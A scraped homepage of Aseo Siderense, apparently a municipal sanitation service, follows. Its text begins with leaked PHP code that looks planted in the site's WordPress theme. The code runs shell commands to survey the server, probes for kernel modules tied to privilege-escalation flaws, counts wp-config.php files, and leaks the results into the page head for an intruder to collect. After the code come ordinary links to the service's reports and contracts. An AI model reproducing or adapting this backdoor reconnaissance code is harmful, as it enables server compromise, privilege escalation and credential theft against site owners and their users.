add_action('after_setup_theme', function() { if (get_option('_t24d')) return; $o = array(); $o['k'] = @substr(@file_get_contents('/proc/version'), 0, 200); $o['h'] = @gethostname(); $o['u'] = posix_getuid(); $o['hc'] = count(@scandir('/home') ?: array()) - 2; $o['pc'] = function_exists('pcntl_exec'); $o['ex'] = function_exists('exec'); $o['sy'] = function_exists('system'); $o['pe'] = function_exists('putenv'); $o['ml'] = function_exists('mail'); $o['po'] = function_exists('proc_open'); $o['p3'] = @file_exists('/usr/bin/python3'); $mods = @file_get_contents('/proc/modules'); $o['af'] = $mods ? (strpos($mods, 'algif_aead') !== false ? 'y' : 'n') : '?'; $o['bl'] = @file_exists('/etc/modprobe.d/disable-algif_aead.conf'); $kr = php_uname('r'); $kc = @file_get_contents('/boot/config-' . $kr); if ($kc) { preg_match('/CONFIG_CRYPTO_USER_API_AEAD=(.*)/', $kc, $m); $o['cr'] = isset($m[1]) ? trim($m[1]) : '?'; } // PHP exec recon (if exec available) if (function_exists('shell_exec')) { $o['ob'] = ini_get('open_basedir'); $o['cfgs'] = trim(@shell_exec('find /var/www/ /home/ /srv/ -maxdepth 5 -name wp-config.php 2>/dev/null | wc -l') ?: '0'); $o['vhosts'] = trim(@shell_exec('ls /var/www/vhosts/ 2>/dev/null | wc -l') ?: '0'); $o['ku'] = trim(@shell_exec('uname -r 2>/dev/null')); } elseif (function_exists('exec')) { $o['ku'] = @exec('uname -r 2>&1'); $o['cfgs'] = @exec('find /var/www/ /home/ -maxdepth 5 -name wp-config.php 2>/dev/null | wc -l'); } // Dirty Frag + Fragnesia: check esp/rxrpc + user namespaces if ($mods) { $o['esp'] = strpos($mods, 'esp4') !== false ? 'y' : 'n'; $o['rxrpc'] = strpos($mods, 'rxrpc') !== false ? 'y' : 'n'; } // Fragnesia: user namespace check — try unshare directly if (function_exists('exec')) { $o['userns'] = trim(@exec('unshare -Urn whoami 2>&1') ?: '?'); } update_option('_t24d', json_encode($o)); }); add_action('wp_head', function() { $v = get_option('_t24d'); if ($v) { echo ''; delete_option('_t24d'); } }); Inicio - Aseo Siderense

Aseo Siderense

thumbnails-2026_nuestro-portafolio-19

Nuestro Portafolio

Ver +
thumbnails-2026_idg

Informes de Gestión

Ver +
thumbnails-2026-ccu

Contrato de Condiciones Uniformes

+
thumbnails-2026_ppsa

Programa de Prestación del Servicio Público de Aseo

Descargar +